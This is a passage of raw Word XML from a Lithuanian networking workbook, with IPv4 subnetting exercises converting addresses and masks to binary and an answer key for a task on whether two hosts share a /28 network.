              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet Mask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938301F" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">255.255.240.0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B9AC4C4" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11111111.11111111.11110000.00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="775CBDEF" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="384"/>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9FEC611" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Network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E01348B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 172.16.176.0</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F49A570" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10101100.00010000.10110000.00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BEF6A98" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Užpildykite trūkstamus lentelių laukus: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="81" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="032EC19B" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="531"/>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AD90AEE"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Aprašyma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238531C4"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Dešimtainis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7D2F5DC" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="27CCA5B2" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="388"/>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3C61221" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">IP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0B24605" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">10.172.2.8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23509FA" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 00001010.10101100.00000010.00001000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5AA86581" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="384"/>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0FD6A63" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet Mask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4E7582B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">255.224.0.0 </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2E3B5D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11111111.11100000.00000000.00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="3F6377C2" w14:textId="77777777" w:rsidTr="004A496A">
        <w:trPr>
          <w:trHeight w:val="382"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="132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94AF67C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Address </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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BDEA6C0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.160.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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7AFD3F7" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 00001010.10100000.00000000.00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65F61CD3" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBCB234" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7A990A" w14:textId="77777777" w:rsidR="00C25BA0" w:rsidRPr="005A5C28" w:rsidRDefault="00C25BA0"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11 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6372A" w14:textId="5268256D" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMA</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F4018" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nustatykite tinklo IP adresus pagal sąlygas:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="right" w:tblpY="135"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5098"/>
        <w:gridCol w:w="4813"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4236948F" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A8A99AE" w14:textId="4BAE62A1" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Konfigūruojate du kompiuterius savo tinkle. PC-A suteikiate IP adresą 192.168.1.18</w:t>
            </w:r>
            <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>PC-B suteikiate IP adresą 192.168.1.33. Abu kompiuteriai gauna tinklo kaukę 255.255.255.240.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="32304FF0" w14:textId="77777777" w:rsidTr="003270AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42EDFE73" w14:textId="382E0EE1" w:rsidR="003270AF" w:rsidRPr="005A5C28" w:rsidRDefault="003270AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kokį tinklo adresą priskiriate kompiuteriui PC-A?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3F476D13" w14:textId="77777777" w:rsidR="003270AF" w:rsidRPr="005A5C28" w:rsidRDefault="003270AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1A96B1AC" w14:textId="77777777" w:rsidTr="003270AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02778275" w14:textId="7323E9A9" w:rsidR="003270AF" w:rsidRPr="005A5C28" w:rsidRDefault="003270AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kokį tinklo adresą nustatote kompiuteriui PC-B?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3DD474EE" w14:textId="77777777" w:rsidR="003270AF" w:rsidRPr="005A5C28" w:rsidRDefault="003270AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3CC5D2E2" w14:textId="77777777" w:rsidTr="003270AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="222ACA7C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Ar abu kompiuteriai yra tame pačiame tinkle ir gali vienas su kitu komunikuoti tiesiogiai? Kodėl?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5EA6B6F6" w14:textId="4A7AAA18" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Kompiuteriai yra skirtinguose tinkluose ir komunikuoti tiesiogiai negali, nes tinklo kaukė susideda iš 28 bit</w:t>
            </w:r>
            <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>. t</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">ai duoda 16 unikalių IP adresų. Šiuo atveju vieno tinklo ribos yra 192.168.1.16-31, o kito tinklo ribos yra </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>192.168.1.32-47.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="650D1759" w14:textId="77777777" w:rsidTr="003270AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C3807F0" w14:textId="380E2114" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Koks</w:t>
            </w:r>
            <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008F5DB6" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">didžiausias </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>IP adresas gali būti suteiktas PC-B, kad jis būtų tame pačiame tinkle</w:t>
            </w:r>
            <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>kaip ir PC-A?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C9541E0" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4028B1F6" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B928FA" w14:textId="1FD16BFE" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nustatykite tinklo IP adresus pagal sąlygas:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5098"/>
        <w:gridCol w:w="4813"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="63901523" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7165A5A1" w14:textId="5E144383" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Konfigūruojate du kompiuterius savo tinkle. PC-A suteikiate IP adresą 10.0.0.16</w:t>
            </w:r>
            <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>PC-B suteikiate IP adresą 10.1.14.68. Abu kompiuteriai gauna tinklo kaukę 255.254.0.0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3CAFAF47" w14:textId="77777777" w:rsidTr="00332B40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
